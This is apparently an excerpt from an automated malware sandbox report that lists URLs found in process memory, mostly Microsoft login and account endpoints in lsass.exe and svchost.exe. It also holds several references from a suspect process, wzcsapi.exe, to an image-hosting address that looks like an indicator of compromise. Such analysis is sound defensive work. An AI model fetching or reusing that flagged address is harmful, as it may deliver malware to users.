                Source: lsass.exe, 00000009.00000000.1362110909.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2643302111.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
                Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
                Source: lsass.exe, 00000009.00000000.1363415063.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2661719499.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=806014
                Source: svchost.exe, 0000000B.00000002.2647979529.0000013DE1902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlines
                Source: svchost.exe, 0000000B.00000002.2647979529.0000013DE1902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&
                Source: svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                Source: svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                Source: svchost.exe, 0000000B.00000003.1375112246.0000013DE212A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600=
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601=
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1375112246.0000013DE212A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369560107.0000013DE2157000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                Source: wzcsapi.exe, 00000003.00000002.2644119365.000000000299C000.00000004.00000800.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2644119365.000000000292F000.00000004.00000800.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2644119365.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2644119365.000000000295E000.00000004.00000800.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2644119365.00000000029A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://i.ibb.co
                Source: wzcsapi.exe, 00000003.00000002.2644119365.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2644119365.0000000002A7F000.00000004.00000800.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2644119365.00000000029A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://i.ibb.co(
                Source: wzcsapi.exe, 00000003.00000002.2644119365.000000000292F000.00000004.00000800.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2674092147.000000001BEE0000.00000004.08000000.00040000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2644119365.00000000028C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://i.ibb.co/Dwrj41N/Image.png
                Source: svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                Source: svchost.exe, 0000000B.00000002.2669200646.0000013DE2871000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2668258474.0000013DE2844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srfs
                Source: svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                Source: svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369894759.0000013DE216B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369894759.0000013DE216B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369894759.0000013DE216B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                Source: svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601er
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                Source: svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf=
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                Source: svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                Source: svchost.exe, 0000000B.00000002.2647979529.0000013DE18FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srfd
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369894759.0000013DE216B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1368955150.0000013DE2110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369894759.0000013DE216B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                Source: svchost.exe, 0000000B.00000003.1369948869.0000013DE2127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srff
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                Source: svchost.exe, 0000000B.00000003.1369948869.0000013DE2127000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369894759.0000013DE216B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                Source: svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srfssuer
                Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369894759.0000013DE216B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                Source: svchost.exe, 0000000B.00000003.1369948869.0000013DE2127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfX
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369894759.0000013DE216B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1375112246.0000013DE212A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369894759.0000013DE216B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                Source: svchost.exe, 0000000B.00000002.2666864067.0000013DE283F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-DjY9H7NyiNrCi
                Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600g:OOBEignInAuthUp
Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1375112246.0000013DE212A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2668258474.0000013DE2844000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369894759.0000013DE216B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
Source: svchost.exe, 0000000B.00000003.1375112246.0000013DE212A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
Source: svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfn
Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
Source: svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2647979529.0000013DE1902000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1375112246.0000013DE212A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1375112246.0000013DE212A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1375112246.0000013DE212A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1375112246.0000013DE212A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369560107.0000013DE2157000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
Source: svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1368989429.0000013DE215A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cpng
Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1375112246.0000013DE212A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf57
Source: svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1368955150.0000013DE2110000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfLive
